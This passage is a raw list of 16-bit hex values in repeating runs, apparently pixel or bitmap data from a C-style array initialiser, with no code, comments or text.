0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 